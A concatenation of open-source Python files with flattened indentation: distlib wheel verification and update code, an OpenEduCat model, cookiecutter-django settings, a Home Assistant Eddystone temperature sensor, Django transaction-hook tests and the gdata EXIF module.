wrapper = codecs.getreader('utf-8')
with ZipFile(pathname, 'r') as zf:
with zf.open(wheel_metadata_name) as bwf:
wf = wrapper(bwf)
message = message_from_file(wf)
wv = message['Wheel-Version'].split('.', 1)
file_version = tuple([int(i) for i in wv])
# TODO version verification
records = {}
with zf.open(record_name) as bf:
with CSVReader(stream=bf) as reader:
for row in reader:
p = row[0]
records[p] = row
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
# See issue #115: some wheels have .. in their entries, but
# in the filename ... e.g. __main__..py ! So the check is
# updated to look for .. in the directory portions
p = u_arcname.split('/')
if '..' in p:
raise DistlibException('invalid entry in '
'wheel: %r' % u_arcname)
if self.skip_entry(u_arcname):
continue
row = records[u_arcname]
if row[2] and str(zinfo.file_size) != row[2]:
raise DistlibException('size mismatch for '
'%s' % u_arcname)
if row[1]:
kind, value = row[1].split('=', 1)
with zf.open(arcname) as bf:
data = bf.read()
_, digest = self.get_hash(data, kind)
if digest != value:
raise DistlibException('digest mismatch for '
'%s' % arcname)
def update(self, modifier, dest_dir=None, **kwargs):
"""
Update the contents of a wheel in a generic way. The modifier should
be a callable which expects a dictionary argument: its keys are
archive-entry paths, and its values are absolute filesystem paths
where the contents the corresponding archive entries can be found. The
modifier is free to change the contents of the files pointed to, add
new entries and remove entries, before returning. This method will
extract the entire contents of the wheel to a temporary location, call
the modifier, and then use the passed (and possibly updated)
dictionary to write a new wheel. If ``dest_dir`` is specified, the new
wheel is written there -- otherwise, the original wheel is overwritten.
The modifier should return True if it updated the wheel, else False.
This method returns the same value the modifier returns.
"""
def get_version(path_map, info_dir):
version = path = None
key = '%s/%s' % (info_dir, METADATA_FILENAME)
if key not in path_map:
key = '%s/PKG-INFO' % info_dir
if key in path_map:
path = path_map[key]
version = Metadata(path=path).version
return version, path
def update_version(version, path):
updated = None
try:
v = NormalizedVersion(version)
i = version.find('-')
if i < 0:
updated = '%s+1' % version
else:
parts = [int(s) for s in version[i + 1:].split('.')]
parts[-1] += 1
updated = '%s+%s' % (version[:i],
'.'.join(str(i) for i in parts))
except UnsupportedVersionError:
logger.debug('Cannot update non-compliant (PEP-440) '
'version %r', version)
if updated:
md = Metadata(path=path)
md.version = updated
legacy = not path.endswith(METADATA_FILENAME)
md.write(path=path, legacy=legacy)
logger.debug('Version updated from %r to %r', version,
updated)
pathname = os.path.join(self.dirname, self.filename)
name_ver = '%s-%s' % (self.name, self.version)
info_dir = '%s.dist-info' % name_ver
record_name = posixpath.join(info_dir, 'RECORD')
with tempdir() as workdir:
with ZipFile(pathname, 'r') as zf:
path_map = {}
for zinfo in zf.infolist():
arcname = zinfo.filename
if isinstance(arcname, text_type):
u_arcname = arcname
else:
u_arcname = arcname.decode('utf-8')
if u_arcname == record_name:
continue
if '..' in u_arcname:
raise DistlibException('invalid entry in '
'wheel: %r' % u_arcname)
zf.extract(zinfo, workdir)
path = os.path.join(workdir, convert_path(u_arcname))
path_map[u_arcname] = path
# Remember the version.
original_version, _ = get_version(path_map, info_dir)
# Files extracted. Call the modifier.
modified = modifier(path_map, **kwargs)
if modified:
# Something changed - need to build a new wheel.
current_version, path = get_version(path_map, info_dir)
if current_version and (current_version == original_version):
# Add or update local version to signify changes.
update_version(current_version, path)
# Decide where the new wheel goes.
if dest_dir is None:
fd, newpath = tempfile.mkstemp(suffix='.whl',
prefix='wheel-update-',
dir=workdir)
os.close(fd)
else:
if not os.path.isdir(dest_dir):
raise DistlibException('Not a directory: %r' % dest_dir)
newpath = os.path.join(dest_dir, self.filename)
archive_paths = list(path_map.items())
distinfo = os.path.join(workdir, info_dir)
info = distinfo, info_dir
self.write_records(info, workdir, archive_paths)
self.build_zip(newpath, archive_paths)
if dest_dir is None:
shutil.copyfile(newpath, pathname)
return modified
def compatible_tags():
"""
Return (pyver, abi, arch) tuples compatible with this Python.
"""
versions = [VER_SUFFIX]
major = VER_SUFFIX[0]
for minor in range(sys.version_info[1] - 1, - 1, -1):
versions.append(''.join([major, str(minor)]))
abis = []
for suffix, _, _ in imp.get_suffixes():
if suffix.startswith('.abi'):
abis.append(suffix.split('.', 2)[1])
abis.sort()
if ABI != 'none':
abis.insert(0, ABI)
abis.append('none')
result = []
arches = [ARCH]
if sys.platform == 'darwin':
m = re.match(r'(\w+)_(\d+)_(\d+)_(\w+)$', ARCH)
if m:
name, major, minor, arch = m.groups()
minor = int(minor)
matches = [arch]
if arch in ('i386', 'ppc'):
matches.append('fat')
if arch in ('i386', 'ppc', 'x86_64'):
matches.append('fat3')
if arch in ('ppc64', 'x86_64'):
matches.append('fat64')
if arch in ('i386', 'x86_64'):
matches.append('intel')
if arch in ('i386', 'x86_64', 'intel', 'ppc', 'ppc64'):
matches.append('universal')
while minor >= 0:
for match in matches:
s = '%s_%s_%s_%s' % (name, major, minor, match)
if s != ARCH: # already there
arches.append(s)
minor -= 1
# Most specific - our Python version, ABI and arch
for abi in abis:
for arch in arches:
result.append((''.join((IMP_PREFIX, versions[0])), abi, arch))
# where no ABI / arch dependency, but IMP_PREFIX dependency
for i, version in enumerate(versions):
result.append((''.join((IMP_PREFIX, version)), 'none', 'any'))
if i == 0:
result.append((''.join((IMP_PREFIX, version[0])), 'none', 'any'))
# no IMP_PREFIX, ABI or arch dependency
for i, version in enumerate(versions):
result.append((''.join(('py', version)), 'none', 'any'))
if i == 0:
result.append((''.join(('py', version[0])), 'none', 'any'))
return set(result)
COMPATIBLE_TAGS = compatible_tags()
del compatible_tags
def is_compatible(wheel, tags=None):
if not isinstance(wheel, Wheel):
wheel = Wheel(wheel) # assume it's a filename
result = False
if tags is None:
tags = COMPATIBLE_TAGS
for ver, abi, arch in tags:
if ver in wheel.pyver and abi in wheel.abi and arch in wheel.arch:
result = True
break
return result
| bsd-2-clause |
mohamedhagag/community-addons | openeducat_erp/op_achievement/op_achievement.py | 1 | 1565 | # -*- coding: utf-8 -*-
###############################################################################
#
# Tech-Receptives Solutions Pvt. Ltd.
# Copyright (C) 2009-TODAY Tech-Receptives(<http://www.techreceptives.com>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
###############################################################################
from openerp import models, fields
class OpAchievement(models.Model):
_name = 'op.achievement'
_rec_name = 'student_id'
student_id = fields.Many2one('op.student', 'Student', required=True)
faculty_id = fields.Many2one('op.faculty', 'Faculty', required=True)
achievement_type = fields.Many2one(
'op.achievement.type', 'Achievement Type', required=True)
description = fields.Text('Description', required=True)
achievement_date = fields.Date('Date', required=True)
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
HellerCommaA/cookiecutter-django | {{cookiecutter.repo_name}}/config/settings/common.py | 8 | 9680 | # -*- coding: utf-8 -*-
"""
Django settings for {{cookiecutter.project_name}} project.
For more information on this file, see
https://docs.djangoproject.com/en/dev/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/dev/ref/settings/
"""
from __future__ import absolute_import, unicode_literals
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (/a/b/myfile.py - 3 = /)
APPS_DIR = ROOT_DIR.path('{{ cookiecutter.repo_name }}')
env = environ.Env()
# APP CONFIGURATION
# ------------------------------------------------------------------------------
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
# Admin
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
'crispy_forms', # Form layouts
'allauth', # registration
'allauth.account', # registration
'allauth.socialaccount', # registration
)
# Apps specific for this project go here.
LOCAL_APPS = (
'{{ cookiecutter.repo_name }}.users', # custom users app
# Your stuff: custom apps go here
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIDDLEWARE CONFIGURATION
# ------------------------------------------------------------------------------
MIDDLEWARE_CLASSES = (
# Make sure djangosecure.middleware.SecurityMiddleware is listed first
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
# MIGRATIONS CONFIGURATION
# ------------------------------------------------------------------------------
MIGRATION_MODULES = {
'sites': '{{ cookiecutter.repo_name }}.contrib.sites.migrations'
}
# DEBUG
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = env.bool("DJANGO_DEBUG", False)
# FIXTURE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL CONFIGURATION
# ------------------------------------------------------------------------------
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# MANAGER CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
("""{{cookiecutter.author_name}}""", '{{cookiecutter.email}}'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# DATABASE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
# Raises ImproperlyConfigured exception if DATABASE_URL not in os.environ
'default': env.db("DATABASE_URL", default="postgres://{% if cookiecutter.windows == 'y' %}localhost{% endif %}/{{cookiecutter.repo_name}}"),
}
DATABASES['default']['ATOMIC_REQUESTS'] = True
# GENERAL CONFIGURATION
# ------------------------------------------------------------------------------
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# In a Windows environment this must be set to your system time zone.
TIME_ZONE = '{{ cookiecutter.timezone }}'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'en-us'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
# TEMPLATE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
# Your stuff: custom template context processors go here
],
},
},
]
# See: http://django-crispy-forms.readthedocs.org/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap3'
# STATIC FILE CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
str(APPS_DIR.path('static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
# MEDIA CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# URL Configuration
# ------------------------------------------------------------------------------
ROOT_URLCONF = 'config.urls'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'config.wsgi.application'
# AUTHENTICATION CONFIGURATION
# ------------------------------------------------------------------------------
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
)
# Some really nice defaults
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
# Custom user app defaults
# Select the correct user model
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# SLUGLIFIER
AUTOSLUG_SLUGIFY_FUNCTION = 'slugify.slugify'
# LOGGING CONFIGURATION
# ------------------------------------------------------------------------------
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
{% if cookiecutter.use_celery == "y" %}
########## CELERY
INSTALLED_APPS += ('{{cookiecutter.repo_name}}.taskapp.celery.CeleryConfig',)
# if you are not using the django database broker (e.g. rabbitmq, redis, memcached), you can remove the next line.
INSTALLED_APPS += ('kombu.transport.django',)
BROKER_URL = env("CELERY_BROKER_URL", default='django://')
########## END CELERY
{% endif %}
# Your common stuff: Below this line define 3rd party library settings
| bsd-3-clause |
qedi-r/home-assistant | homeassistant/components/eddystone_temperature/sensor.py | 2 | 5793 | """
Read temperature information from Eddystone beacons.
Your beacons must be configured to transmit UID (for identification) and TLM
(for temperature) frames.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.eddystone_temperature/
"""
import logging
# pylint: disable=import-error
from beacontools import (
BeaconScanner,
EddystoneFilter,
EddystoneTLMFrame,
)
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (
CONF_NAME,
EVENT_HOMEASSISTANT_START,
EVENT_HOMEASSISTANT_STOP,
STATE_UNKNOWN,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
CONF_BEACONS = "beacons"
CONF_BT_DEVICE_ID = "bt_device_id"
CONF_INSTANCE = "instance"
CONF_NAMESPACE = "namespace"
BEACON_SCHEMA = vol.Schema(
{
vol.Required(CONF_NAMESPACE): cv.string,
vol.Required(CONF_INSTANCE): cv.string,
vol.Optional(CONF_NAME): cv.string,
}
)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Optional(CONF_BT_DEVICE_ID, default=0): cv.positive_int,
vol.Required(CONF_BEACONS): vol.Schema({cv.string: BEACON_SCHEMA}),
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Validate configuration, create devices and start monitoring thread."""
bt_device_id = config.get("bt_device_id")
beacons = config.get(CONF_BEACONS)
devices = []
for dev_name, properties in beacons.items():
namespace = get_from_conf(properties, CONF_NAMESPACE, 20)
instance = get_from_conf(properties, CONF_INSTANCE, 12)
name = properties.get(CONF_NAME, dev_name)
if instance is None or namespace is None:
_LOGGER.error("Skipping %s", dev_name)
continue
devices.append(EddystoneTemp(name, namespace, instance))
if devices:
mon = Monitor(hass, devices, bt_device_id)
def monitor_stop(_service_or_event):
"""Stop the monitor thread."""
_LOGGER.info("Stopping scanner for Eddystone beacons")
mon.stop()
def monitor_start(_service_or_event):
"""Start the monitor thread."""
_LOGGER.info("Starting scanner for Eddystone beacons")
mon.start()
add_entities(devices)
mon.start()
hass.bus.listen_once(EVENT_HOMEASSISTANT_STOP, monitor_stop)
hass.bus.listen_once(EVENT_HOMEASSISTANT_START, monitor_start)
else:
_LOGGER.warning("No devices were added")
def get_from_conf(config, config_key, length):
"""Retrieve value from config and validate length."""
string = config.get(config_key)
if len(string) != length:
_LOGGER.error(
"Error in config parameter %s: Must be exactly %d "
"bytes. Device will not be added",
config_key,
length / 2,
)
return None
return string
class EddystoneTemp(Entity):
"""Representation of a temperature sensor."""
def __init__(self, name, namespace, instance):
"""Initialize a sensor."""
self._name = name
self.namespace = namespace
self.instance = instance
self.bt_addr = None
self.temperature = STATE_UNKNOWN
@property
def name(self):
"""Return the name of the sensor."""
return self._name
@property
def state(self):
"""Return the state of the device."""
return self.temperature
@property
def unit_of_measurement(self):
"""Return the unit the value is expressed in."""
return TEMP_CELSIUS
@property
def should_poll(self):
"""Return the polling state."""
return False
class Monitor:
"""Continuously scan for BLE advertisements."""
def __init__(self, hass, devices, bt_device_id):
"""Construct interface object."""
self.hass = hass
# List of beacons to monitor
self.devices = devices
# Number of the bt device (hciX)
self.bt_device_id = bt_device_id
def callback(bt_addr, _, packet, additional_info):
"""Handle new packets."""
self.process_packet(
additional_info["namespace"],
additional_info["instance"],
packet.temperature,
)
device_filters = [EddystoneFilter(d.namespace, d.instance) for d in devices]
self.scanner = BeaconScanner(
callback, bt_device_id, device_filters, EddystoneTLMFrame
)
self.scanning = False
def start(self):
"""Continuously scan for BLE advertisements."""
if not self.scanning:
self.scanner.start()
self.scanning = True
else:
_LOGGER.debug("start() called, but scanner is already running")
def process_packet(self, namespace, instance, temperature):
"""Assign temperature to device."""
_LOGGER.debug(
"Received temperature for <%s,%s>: %d", namespace, instance, temperature
)
for dev in self.devices:
if dev.namespace == namespace and dev.instance == instance:
if dev.temperature != temperature:
dev.temperature = temperature
dev.schedule_update_ha_state()
def stop(self):
"""Signal runner to stop and join thread."""
if self.scanning:
_LOGGER.debug("Stopping...")
self.scanner.stop()
_LOGGER.debug("Stopped")
self.scanning = False
else:
_LOGGER.debug("stop() called but scanner was not running")
| apache-2.0 |
blighj/django | tests/transaction_hooks/tests.py | 64 | 6900 | from django.db import connection, transaction
from django.test import TransactionTestCase, skipUnlessDBFeature
from .models import Thing
class ForcedError(Exception):
pass
class TestConnectionOnCommit(TransactionTestCase):
"""
Tests for transaction.on_commit().
Creation/checking of database objects in parallel with callback tracking is
to verify that the behavior of the two match in all tested cases.
"""
available_apps = ['transaction_hooks']
def setUp(self):
self.notified = []
def notify(self, id_):
if id_ == 'error':
raise ForcedError()
self.notified.append(id_)
def do(self, num):
"""Create a Thing instance and notify about it."""
Thing.objects.create(num=num)
transaction.on_commit(lambda: self.notify(num))
def assertDone(self, nums):
self.assertNotified(nums)
self.assertEqual(sorted(t.num for t in Thing.objects.all()), sorted(nums))
def assertNotified(self, nums):
self.assertEqual(self.notified, nums)
def test_executes_immediately_if_no_transaction(self):
self.do(1)
self.assertDone([1])
def test_delays_execution_until_after_transaction_commit(self):
with transaction.atomic():
self.do(1)
self.assertNotified([])
self.assertDone([1])
def test_does_not_execute_if_transaction_rolled_back(self):
try:
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
self.assertDone([])
def test_executes_only_after_final_transaction_committed(self):
with transaction.atomic():
with transaction.atomic():
self.do(1)
self.assertNotified([])
self.assertNotified([])
self.assertDone([1])
def test_discards_hooks_from_rolled_back_savepoint(self):
with transaction.atomic():
# one successful savepoint
with transaction.atomic():
self.do(1)
# one failed savepoint
try:
with transaction.atomic():
self.do(2)
raise ForcedError()
except ForcedError:
pass
# another successful savepoint
with transaction.atomic():
self.do(3)
# only hooks registered during successful savepoints execute
self.assertDone([1, 3])
def test_no_hooks_run_from_failed_transaction(self):
"""If outer transaction fails, no hooks from within it run."""
try:
with transaction.atomic():
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
self.assertDone([])
def test_inner_savepoint_rolled_back_with_outer(self):
with transaction.atomic():
try:
with transaction.atomic():
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
self.do(2)
self.assertDone([2])
def test_no_savepoints_atomic_merged_with_outer(self):
with transaction.atomic():
with transaction.atomic():
self.do(1)
try:
with transaction.atomic(savepoint=False):
raise ForcedError()
except ForcedError:
pass
self.assertDone([])
def test_inner_savepoint_does_not_affect_outer(self):
with transaction.atomic():
with transaction.atomic():
self.do(1)
try:
with transaction.atomic():
raise ForcedError()
except ForcedError:
pass
self.assertDone([1])
def test_runs_hooks_in_order_registered(self):
with transaction.atomic():
self.do(1)
with transaction.atomic():
self.do(2)
self.do(3)
self.assertDone([1, 2, 3])
def test_hooks_cleared_after_successful_commit(self):
with transaction.atomic():
self.do(1)
with transaction.atomic():
self.do(2)
self.assertDone([1, 2]) # not [1, 1, 2]
def test_hooks_cleared_after_rollback(self):
try:
with transaction.atomic():
self.do(1)
raise ForcedError()
except ForcedError:
pass
with transaction.atomic():
self.do(2)
self.assertDone([2])
@skipUnlessDBFeature('test_db_allows_multiple_connections')
def test_hooks_cleared_on_reconnect(self):
with transaction.atomic():
self.do(1)
connection.close()
connection.connect()
with transaction.atomic():
self.do(2)
self.assertDone([2])
def test_error_in_hook_doesnt_prevent_clearing_hooks(self):
try:
with transaction.atomic():
transaction.on_commit(lambda: self.notify('error'))
except ForcedError:
pass
with transaction.atomic():
self.do(1)
self.assertDone([1])
def test_db_query_in_hook(self):
with transaction.atomic():
Thing.objects.create(num=1)
transaction.on_commit(
lambda: [self.notify(t.num) for t in Thing.objects.all()]
)
self.assertDone([1])
def test_transaction_in_hook(self):
def on_commit():
with transaction.atomic():
t = Thing.objects.create(num=1)
self.notify(t.num)
with transaction.atomic():
transaction.on_commit(on_commit)
self.assertDone([1])
def test_hook_in_hook(self):
def on_commit(i, add_hook):
with transaction.atomic():
if add_hook:
transaction.on_commit(lambda: on_commit(i + 10, False))
t = Thing.objects.create(num=i)
self.notify(t.num)
with transaction.atomic():
transaction.on_commit(lambda: on_commit(1, True))
transaction.on_commit(lambda: on_commit(2, True))
self.assertDone([1, 11, 2, 12])
def test_raises_exception_non_autocommit_mode(self):
def should_never_be_called():
raise AssertionError('this function should never be called')
try:
connection.set_autocommit(False)
with self.assertRaises(transaction.TransactionManagementError):
transaction.on_commit(should_never_be_called)
finally:
connection.set_autocommit(True)
| bsd-3-clause |
Immortalin/python-for-android | python-build/python-libs/gdata/build/lib/gdata/exif/__init__.py | 253 | 6981 | # -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.exif, implementing the exif namespace in gdata
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This module maps elements from the {EXIF} namespace[1] to GData objects.
These elements describe image data, using exif attributes[2].
Picasa Web Albums uses the exif namespace to represent Exif data encoded
in a photo [3].
Picasa Web Albums uses the following exif elements:
exif:distance
exif:exposure
exif:flash
exif:focallength
exif:fstop
exif:imageUniqueID
exif:iso
exif:make
exif:model
exif:tags
exif:time
[1]: http://schemas.google.com/photos/exif/2007.
[2]: http://en.wikipedia.org/wiki/Exif
[3]: http://code.google.com/apis/picasaweb/reference.html#exif_reference
"""
__author__ = u'havard@gulldahl.no'# (Håvard Gulldahl)' #BUG: pydoc chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
EXIF_NAMESPACE = 'http://schemas.google.com/photos/exif/2007'
class ExifBaseElement(atom.AtomBase):
"""Base class for elements in the EXIF_NAMESPACE (%s). To add new elements, you only need to add the element tag name to self._tag
""" % EXIF_NAMESPACE
_tag = ''
_namespace = EXIF_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Distance(ExifBaseElement):
"(float) The distance to the subject, e.g. 0.0"
_tag = 'distance'
def DistanceFromString(xml_string):
return atom.CreateClassFromXMLString(Distance, xml_string)
class Exposure(ExifBaseElement):
"(float) The exposure time used, e.g. 0.025 or 8.0E4"
_tag = 'exposure'
def ExposureFromString(xml_string):
return atom.CreateClassFromXMLString(Exposure, xml_string)
class Flash(ExifBaseElement):
"""(string) Boolean value indicating whether the flash was used.
The .text attribute will either be `true' or `false'
As a convenience, this object's .bool method will return what you want,
so you can say:
flash_used = bool(Flash)
"""
_tag = 'flash'
def __bool__(self):
if self.text.lower() in ('true','false'):
return self.text.lower() == 'true'
def FlashFromString(xml_string):
return atom.CreateClassFromXMLString(Flash, xml_string)
class Focallength(ExifBaseElement):
"(float) The focal length used, e.g. 23.7"
_tag = 'focallength'
def FocallengthFromString(xml_string):
return atom.CreateClassFromXMLString(Focallength, xml_string)
class Fstop(ExifBaseElement):
"(float) The fstop value used, e.g. 5.0"
_tag = 'fstop'
def FstopFromString(xml_string):
return atom.CreateClassFromXMLString(Fstop, xml_string)
class ImageUniqueID(ExifBaseElement):
"(string) The unique image ID for the photo. Generated by Google Photo servers"
_tag = 'imageUniqueID'
def ImageUniqueIDFromString(xml_string):
return atom.CreateClassFromXMLString(ImageUniqueID, xml_string)
class Iso(ExifBaseElement):
"(int) The iso equivalent value used, e.g. 200"
_tag = 'iso'
def IsoFromString(xml_string):
return atom.CreateClassFromXMLString(Iso, xml_string)
class Make(ExifBaseElement):
"(string) The make of the camera used, e.g. Fictitious Camera Company"
_tag = 'make'
def MakeFromString(xml_string):
return atom.CreateClassFromXMLString(Make, xml_string)
class Model(ExifBaseElement):
"(string) The model of the camera used,e.g AMAZING-100D"
_tag = 'model'
def ModelFromString(xml_string):
return atom.CreateClassFromXMLString(Model, xml_string)
class Time(ExifBaseElement):
"""(int) The date/time the photo was taken, e.g. 1180294337000.
Represented as the number of milliseconds since January 1st, 1970.
The value of this element will always be identical to the value
of the <gphoto:timestamp>.
Look at this object's .isoformat() for a human friendly datetime string:
photo_epoch = Time.text # 1180294337000
photo_isostring = Time.isoformat() # '2007-05-27T19:32:17.000Z'
Alternatively:
photo_datetime = Time.datetime() # (requires python >= 2.3)
"""
_tag = 'time'
def isoformat(self):
"""(string) Return the timestamp as a ISO 8601 formatted string,
e.g. '2007-05-27T19:32:17.000Z'
"""
import time
epoch = float(self.text)/1000
return time.strftime('%Y-%m-%dT%H:%M:%S.000Z', time.gmtime(epoch))
def datetime(self):
"""(datetime.datetime) Return the timestamp as a datetime.datetime object
Requires python 2.3
"""
import datetime
epoch = float(self.text)/1000
return datetime.datetime.fromtimestamp(epoch)
def TimeFromString(xml_string):
return atom.CreateClassFromXMLString(Time, xml_string)
class Tags(ExifBaseElement):
"""The container for all exif elements.
The <exif:tags> element can appear as a child of a photo entry.
"""
_tag = 'tags'
_children = atom.AtomBase._children.copy()
_children['{%s}fstop' % EXIF_NAMESPACE] = ('fstop', Fstop)
_children['{%s}make' % EXIF_NAMESPACE] = ('make', Make)
_children['{%s}model' % EXIF_NAMESPACE] = ('model', Model)
_children['{%s}distance' % EXIF_NAMESPACE] = ('distance', Distance)
_children['{%s}exposure' % EXIF_NAMESPACE] = ('exposure', Exposure)
_children['{%s}flash' % EXIF_NAMESPACE] = ('flash', Flash)
_children['{%s}focallength' % EXIF_NAMESPACE] = ('focallength', Focallength)
_children['{%s}iso' % EXIF_NAMESPACE] = ('iso', Iso)
_children['{%s}time' % EXIF_NAMESPACE] = ('time', Time)
_children['{%s}imageUniqueID' % EXIF_NAMESPACE] = ('imageUniqueID', ImageUniqueID)
def __init__(self, extension_elements=None, extension_attributes=None, text=None):
ExifBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
self.fstop=None
self.make=None
self.model=None
self.distance=None
self.exposure=None
self.flash=None
self.focallength=None
self.iso=None
self.time=None
self.imageUniqueID=None
def TagsFromString(xml_string):
return atom.CreateClassFromXMLString(Tags, xml_string)
| apache-2.0 |
urdh/streck | streck/controller/stats.py | 1 | 1319 | # -*- coding: utf-8 -*-
